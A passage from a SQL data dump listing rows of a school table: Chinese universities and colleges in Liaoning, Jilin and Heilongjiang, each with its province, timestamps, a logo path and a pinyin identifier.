17:40:34','/images/school/default.png','zhongguoxingshijingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(495,'辽宁医学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningyixueyuan',0,NULL,NULL,0,NULL,NULL),(496,'沈阳医学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangyixueyuan',0,NULL,NULL,0,NULL,NULL),(497,'鞍山师范学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','anshanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(498,'沈阳体育学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangtiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(499,'沈阳音乐学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(500,'鲁迅美术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','luxunmeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(501,'辽宁科技学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningkejixueyuan',0,NULL,NULL,0,NULL,NULL),(502,'沈阳工程学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyanggongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(503,'辽东学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaodongxueyuan',0,NULL,NULL,0,NULL,NULL),(504,'沈阳工学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyanggongxueyuan',0,NULL,NULL,0,NULL,NULL),(505,'大连科技学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','daliankejixueyuan',0,NULL,NULL,0,NULL,NULL),(506,'沈阳城市建设学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangchengshijianshexueyuan',0,NULL,NULL,0,NULL,NULL),(507,'大连财经学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','daliancaijingxueyuan',0,NULL,NULL,0,NULL,NULL),(508,'沈阳城市学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangchengshixueyuan',0,NULL,NULL,0,NULL,NULL),(509,'大连艺术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(510,'辽宁何氏医学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningheshiyixueyuan',0,NULL,NULL,0,NULL,NULL),(511,'大连东软信息学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','daliandongruanxinxixueyuan',0,NULL,NULL,0,NULL,NULL),(512,'辽宁财贸学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningcaimaoxueyuan',0,NULL,NULL,0,NULL,NULL),(513,'营口理工学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yingkouligongxueyuan',0,NULL,NULL,0,NULL,NULL),(514,'辽宁对外经贸学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningduiwaijingmaoxueyuan',0,NULL,NULL,0,NULL,NULL),(515,'朝阳师范高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','zhaoyangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(516,'抚顺师范高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','fushunshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(517,'锦州师范高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jinzhoushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(518,'铁岭师范高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tielingshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(519,'阜新高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','fuxingaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(520,'辽宁警官高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningjingguangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(521,'辽宁交通高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningjiaotonggaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(522,'辽宁税务高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningshuiwugaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(523,'辽宁民族师范高等专科学校','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningminzushifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(524,'大连职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(525,'抚顺职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','fushunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(526,'辽宁农业职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningnongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(527,'盘锦职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','panjinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(528,'辽宁理工学院','辽宁省','2014-04-23 00:00:00','2017-09-04 17:08:06','/images/school/default.png','liaoningligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(529,'辽宁轨道交通职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningguidaojiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(530,'辽宁地质工程职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningdizhigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(531,'辽宁铁道职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningtiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(532,'辽宁建筑职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningjianzhuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(533,'大连航运职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianhangyunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(534,'大连装备制造职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianzhuangbeizhizaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(535,'大连汽车职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianqichezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(536,'辽宁现代服务职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningxiandaifuwuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(537,'辽宁冶金职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningyejinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(538,'辽宁工程职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoninggongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(539,'辽宁城市建设职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningchengshijianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(540,'辽宁卫生职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(541,'铁岭卫生职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tielingweishengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(542,'沈阳北软信息职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangbeiruanxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(543,'辽宁政法职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningzhengfazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(544,'辽宁轻工职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningqinggongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(545,'辽宁水利职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningshuilizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(546,'营口职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yingkouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(547,'辽阳职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(548,'沈阳航空职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyanghangkongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(549,'辽宁体育运动职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningtiyuyundongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(550,'辽宁职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(551,'辽宁林业职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoninglinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(552,'沈阳职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','shenyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(553,'大连商务职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianshangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(554,'辽宁金融职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningjinrongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(555,'辽宁广告职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningguanggaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(556,'辽宁机电职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(557,'辽宁经济职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningjingjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(558,'辽宁石化职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningshihuazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(559,'渤海船舶职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','bohaichuanbozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(560,'辽宁美术职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningmeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(561,'大连软件职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianruanjianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(562,'大连翻译职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianfanyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(563,'辽宁商贸职业学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningshangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(564,'大连枫叶职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dalianfengyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(565,'辽宁装备制造职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoningzhuangbeizhizaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(566,'辽河石油职业技术学院','辽宁省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoheshiyouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(567,'吉林大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilindaxue',0,NULL,NULL,0,NULL,NULL),(568,'东北师范大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dongbeishifandaxue',0,NULL,NULL,0,NULL,NULL),(569,'延边大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yanbiandaxue',0,NULL,NULL,0,NULL,NULL),(570,'长春理工大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunligongdaxue',0,NULL,NULL,0,NULL,NULL),(571,'长春工业大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchungongyedaxue',0,NULL,NULL,0,NULL,NULL),(572,'吉林建筑大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinjianzhudaxue',0,NULL,NULL,0,NULL,NULL),(573,'吉林农业大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinnongyedaxue',0,NULL,NULL,0,NULL,NULL),(574,'长春中医药大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(575,'北华大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','beihuadaxue',0,NULL,NULL,0,NULL,NULL),(576,'吉林师范大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinshifandaxue',0,NULL,NULL,0,NULL,NULL),(577,'长春师范大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunshifandaxue',0,NULL,NULL,0,NULL,NULL),(578,'吉林财经大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilincaijingdaxue',0,NULL,NULL,0,NULL,NULL),(579,'长春大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchundaxue',0,NULL,NULL,0,NULL,NULL),(580,'东北电力大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/580.png','dongbeidianlidaxue',0,NULL,NULL,0,NULL,NULL),(581,'吉林化工学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinhuagongxueyuan',0,NULL,NULL,0,NULL,NULL),(582,'通化师范学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','tonghuashifanxueyuan',0,NULL,NULL,0,NULL,NULL),(583,'吉林工程技术师范学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/583.png','jilingongchengjishushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(584,'白城师范学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baichengshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(585,'吉林体育学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilintiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(586,'吉林艺术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(587,'吉林华桥外国语学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinhuaqiaowaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(588,'吉林工商学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilingongshangxueyuan',0,NULL,NULL,0,NULL,NULL),(589,'长春工程学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchungongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(590,'吉林农业科技学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinnongyekejixueyuan',0,NULL,NULL,0,NULL,NULL),(591,'吉林警察学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(592,'长春光华学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunguanghuaxueyuan',0,NULL,NULL,0,NULL,NULL),(593,'长春建筑学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunjianzhuxueyuan',0,NULL,NULL,0,NULL,NULL),(594,'长春科技学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunkejixueyuan',0,NULL,NULL,0,NULL,NULL),(595,'吉林动画学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilindonghuaxueyuan',0,NULL,NULL,0,NULL,NULL),(596,'吉林医药学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinyiyaoxueyuan',0,NULL,NULL,0,NULL,NULL),(597,'长春汽车工业高等专科学校','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunqichegongyegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(598,'长春金融高等专科学校','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunjinronggaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(599,'长春医学高等专科学校','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(600,'白城医学高等专科学校','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baichengyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(601,'辽源职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','liaoyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(602,'四平职业大学','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','sipingzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(603,'吉林交通职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(604,'吉林铁道职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilintiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(605,'白城职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','baichengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(606,'长白山职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changbaishanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(607,'吉林科技职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinkejizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(608,'延边职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','yanbianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(609,'吉林城市职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinchengshizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(610,'长春东方职业学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchundongfangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(611,'吉林司法警官职业学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinsifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(612,'吉林电子信息职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilindianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(613,'吉林工业职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilingongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(614,'吉林农业工程职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','jilinnongyegongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(615,'长春职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(616,'长春信息技术职业学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','changchunxinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(617,'松原职业技术学院','吉林省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','songyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(618,'东北林业大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','dongbeilinyedaxue',0,NULL,NULL,0,NULL,NULL),(619,'哈尔滨工业大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','haerbingongyedaxue',0,NULL,NULL,0,NULL,NULL),(620,'哈尔滨工程大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','haerbingongchengdaxue',0,NULL,NULL,0,NULL,NULL),(621,'黑龙江大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','heilongjiangdaxue',0,NULL,NULL,0,NULL,NULL),(622,'哈尔滨理工大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:34','/images/school/default.png','haerbinligongdaxue',0,NULL,NULL,0,NULL,NULL),(623,'黑龙江科技大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangkejidaxue',0,NULL,NULL,0,NULL,NULL),(624,'东北石油大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','dongbeishiyoudaxue',0,NULL,NULL,0,NULL,NULL),(625,'佳木斯大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/625.png','jiamusidaxue',0,NULL,NULL,0,NULL,NULL),(626,'黑龙江八一农垦大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangbayinongkendaxue',0,NULL,NULL,0,NULL,NULL),(627,'东北农业大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','dongbeinongyedaxue',0,NULL,NULL,0,NULL,NULL),(628,'哈尔滨医科大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinyikedaxue',0,NULL,NULL,0,NULL,NULL),(629,'黑龙江中医药大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(630,'哈尔滨师范大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinshifandaxue',0,NULL,NULL,0,NULL,NULL),(631,'齐齐哈尔大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','qiqihaerdaxue',0,NULL,NULL,0,NULL,NULL),(632,'哈尔滨商业大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinshangyedaxue',0,NULL,NULL,0,NULL,NULL),(633,'牡丹江医学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','mudanjiangyixueyuan',0,NULL,NULL,0,NULL,NULL),(634,'牡丹江师范学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','mudanjiangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(635,'大庆师范学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','daqingshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(636,'绥化学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suihuaxueyuan',0,NULL,NULL,0,NULL,NULL),(637,'哈尔滨体育学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbintiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(638,'哈尔滨金融学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinjinrongxueyuan',0,NULL,NULL,0,NULL,NULL),(639,'哈尔滨学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinxueyuan',0,NULL,NULL,0,NULL,NULL),(640,'齐齐哈尔医学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','qiqihaeryixueyuan',0,NULL,NULL,0,NULL,NULL),(641,'黑龙江工程学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjianggongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(642,'黑龙江工业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjianggongyexueyuan',0,NULL,NULL,0,NULL,NULL),(643,'黑龙江东方学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangdongfangxueyuan',0,NULL,NULL,0,NULL,NULL),(644,'齐齐哈尔工程学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','qiqihaergongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(645,'黑龙江外国语学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangwaiguoyuxueyuan',0,NULL,NULL,0,NULL,NULL),(646,'黑龙江财经学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangcaijingxueyuan',0,NULL,NULL,0,NULL,NULL),(647,'哈尔滨石油学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinshiyouxueyuan',0,NULL,NULL,0,NULL,NULL),(648,'哈尔滨远东理工学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinyuandongligongxueyuan',0,NULL,NULL,0,NULL,NULL),(649,'哈尔滨剑桥学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinjianqiaoxueyuan',0,NULL,NULL,0,NULL,NULL),(650,'哈尔滨广厦学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinguangshaxueyuan',0,NULL,NULL,0,NULL,NULL),(651,'哈尔滨华德学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinhuadexueyuan',0,NULL,NULL,0,NULL,NULL),(652,'黑河学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heihexueyuan',0,NULL,NULL,0,NULL,NULL),(653,'齐齐哈尔高等师范专科学校','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','qiqihaergaodengshifanzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(654,'黑龙江护理高等专科学校','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjianghuligaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(655,'哈尔滨幼儿师范高等专科学校','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(656,'鹤岗师范高等专科学校','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hegangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(657,'大庆医学高等专科学校','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','daqingyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(658,'黑龙江幼儿师范高等专科学校','黑龙江省','2014-04-23 00:00:00','2015-10-16 